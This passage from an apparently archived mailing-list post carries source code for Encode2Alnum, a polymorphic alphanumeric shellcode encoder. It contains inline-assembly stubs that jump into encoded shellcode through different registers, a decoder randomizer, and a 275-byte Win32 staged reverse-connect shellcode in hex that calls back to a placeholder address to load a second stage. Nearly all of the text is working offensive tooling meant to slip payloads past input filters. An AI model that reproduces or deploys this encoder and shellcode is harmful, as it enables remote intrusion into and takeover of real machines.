jmp EncodedShellcode
}
}
}
}
}
else if (reg_type == EDI)
{
if (!reg_indirect)
{
if (!reg_offset) // "EDI"
{
_asm
{
mov edi, EncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "EDI-off"
{
_asm
{
mov edi, EncodedShellcode
add edi, reg_offset
jmp EncodedShellcode
}
}
else // "EDI+off"
{
_asm
{
mov edi, EncodedShellcode
sub edi, reg_offset
jmp EncodedShellcode
}
}
}
}
else
{
if (!reg_offset) // "[EDI]"
{
_asm
{
mov edi, pEncodedShellcode
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "[EDI-off]"
{
_asm
{
mov edi, pEncodedShellcode
add edi, reg_offset
jmp EncodedShellcode
}
}
else // "[EDI+off]"
{
_asm
{
mov edi, pEncodedShellcode
sub edi, reg_offset
jmp EncodedShellcode
}
}
}
}
}
else if (reg_type == EBP)
{
if (!reg_indirect)
{
if (!reg_offset) // "EBP"
{
_asm
{
mov eax, EncodedShellcode
mov ebp, eax
jmp eax
}
}
else
{
if (reg_negative) // "EBP-off"
{
_asm
{
mov eax, EncodedShellcode
mov ebp, eax
add ebp, reg_offset
jmp eax
}
}
else // "EBP+off"
{
_asm
{
mov eax, EncodedShellcode
mov ebp, eax
sub ebp, reg_offset
jmp eax
}
}
}
}
else
{
if (!reg_offset) // "[EBP]"
{
_asm
{
mov eax, pEncodedShellcode
mov ebp, eax
mov eax, [eax]
jmp eax
}
}
else
{
if (reg_negative) // "[EBP-off]"
{
_asm
{
//int 3
mov eax, pEncodedShellcode
add ebp, reg_offset
mov ebp, eax
mov eax, pEncodedShellcode
jmp eax
}
}
else // "[EBP+off]"
{
_asm
{
//int 3
mov eax, pEncodedShellcode
sub eax, reg_offset
mov ebp, eax
mov eax, pEncodedShellcode
jmp eax
}
}
}
}
}
else if (reg_type == ESP)
{
if (!reg_indirect)
{
if (!reg_offset) // "ESP"
{
char *tmp;
_asm
{
sub esp, EncodedShellcodeLength
mov tmp, esp
}
memcpy(tmp, EncodedShellcode, EncodedShellcodeLength);
_asm
{
jmp esp
}
}
else
{
if (reg_negative) // "[ESP-off]"
{
_asm
{
//int 3
mov eax, pEncodedShellcode
sub esp, reg_offset
mov [esp], eax
add esp, reg_offset
mov eax, EncodedShellcode
jmp eax
}
}
else // "[ESP+off]"
{
_asm
{
//int 3
sub esp, 4
mov eax, pEncodedShellcode
mov [esp], eax
sub esp, reg_offset
mov eax, EncodedShellcode
jmp eax
}
}
}
}
else
{
if (!reg_offset) // "[ESP]"
{
_asm
{
mov eax, EncodedShellcode
push eax
jmp EncodedShellcode
}
}
else
{
if (reg_negative) // "[ESP-off]"
{
_asm
{
//int 3
mov eax, EncodedShellcode
sub esp, reg_offset
push eax
add esp, reg_offset
jmp EncodedShellcode
}
}
else // "[ESP+off]"
{
_asm
{
//int 3
mov eax, pEncodedShellcode
push eax
sub esp, reg_offset
jmp EncodedShellcode
}
}
}
}
}
else
{
assert(0);
}
}
#endif
=== enc2alnum/randomize.c
// Encode2Alnum (polymorphic alphanumeric decoder/encoder)
// Copyright (C) 2003-2004, Matt Conover, Avri Schneider and Soren Macbeth
#include <windows.h>
#include "enc2alnum.h"
RANDOMIZER g_Randomizers[] =
{
//{ '^', 0, FALSE, ALNUM_CHARSET },
{ '*', 0, FALSE, INDIRECT_CHARSET },
{ '!', 3, TRUE, INDIRECT_CHARSET },
{ 0, 0, FALSE, NULL }
};
BYTE Key;
BYTE Terminator;
BYTE GetRandomByte()
{
BYTE alnum;
do { alnum = RANDOM_ALNUM(); } while (!isalnum(alnum));
return alnum;
}
void Randomize(BYTE *In, BYTE RandomArray[], DWORD Length)
{
DWORD i;
for (i = 0; i < Length; i++)
{
In[i] = RandomArray[rand() % strlen(RandomArray)];
}
}
int FindRandomizerIndex(BYTE RandomizeKey)
{
int i;
for (i = 0; g_Randomizers[i].RandomizeKey != 0; i++)
{
if (g_Randomizers[i].RandomizeKey == RandomizeKey) return i;
}
return -1;
}
BOOL RandomizeDecoder(BYTE *Buffer, DWORD Length)
{
DWORD i;
DWORD RandomizerLength;
int Index;
DWORD saved_i = 0;
BYTE saved_key = 0;
BOOL ReplaceNextMatch = FALSE;
for (i = 0; i < Length; i++)
{
if (isalnum(Buffer[i])) continue;
if (Buffer[i] == KEY)
{
Buffer[i] = Key = GetRandomByte();
}
else if (Buffer[i] == TERMINATOR)
{
Buffer[i] = Terminator = GetRandomByte();
}
else
{
Index = FindRandomizerIndex(Buffer[i]);
if (Index < 0)
{
fprintf(stderr, "ERROR: invalid stub or decoder (unknown randomizer
'%c')\n", Buffer[i]);
return FALSE;
}
RandomizerLength = 1 + g_Randomizers[Index].Extra;
if (ReplaceNextMatch && Buffer[i] == saved_key)
{
memcpy(Buffer+i, Buffer+saved_i, RandomizerLength);
ReplaceNextMatch = FALSE;
saved_i = 0;
saved_key = 0;
i += g_Randomizers[Index].Extra;
}
else
{
if (g_Randomizers[Index].ReplaceNextMatch)
{
ReplaceNextMatch = TRUE;
saved_i = i;
saved_key = Buffer[i];
}
Randomize(Buffer+i, g_Randomizers[Index].CharacterSet,
RandomizerLength);
}
}
}
return TRUE;
}
=== enc2alnum/shellcode_samples/win32_stage_reverse_read.c
BYTE HexDump[] = // 275 bytes
"\x81\xe4\xfc\xff\xff\xff\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b"
"\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b"
"\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31"
"\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24"
"\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01"
"\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08"
"\x00\x5e\x6a\x30\x59\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b"
"\x8b\x5b\x08\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00"
"\x01\x00\x00\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00"
"\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5"
"\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18"
"\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff"
"\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37"
"\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24"
"\x89\xc7\x68\xaa\xbb\xcc\xdd\x68\x02\x00\xab\xcd\x89\xe1\x6a\x10"
"\x51\x57\xff\x55\x20\x59\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a"
"\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00"
"\x00\xff\xd3";
=== enc2alnum/shellcode_samples/make.bat
@echo off
del win32_stage_reverse_read.bin 2>NUL
nasmw -f bin -o win32_stage_reverse_read.bin
win32_stage_boot_reverse_read.asm
hexdump -h -c win32_stage_reverse_read.bin > win32_stage_reverse_read.c
echo Bin is win32_stage_reverse_read.bin
echo C string is win32_stage_reverse_read.c
=== enc2alnum/shellcode_samples/win32_stage_api.asm
Original by HDM, see www.metasploit.com
=== enc2alnum/shellcode_samples/win32_stage_boot_reverse.asm
Original by HDM, see www.metasploit.com
=== enc2alnum/shellcode_samples/win32_stage_boot_reverse_read.asm
Original by HDM, see www.metasploit.com
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Powered by blists - more mailing lists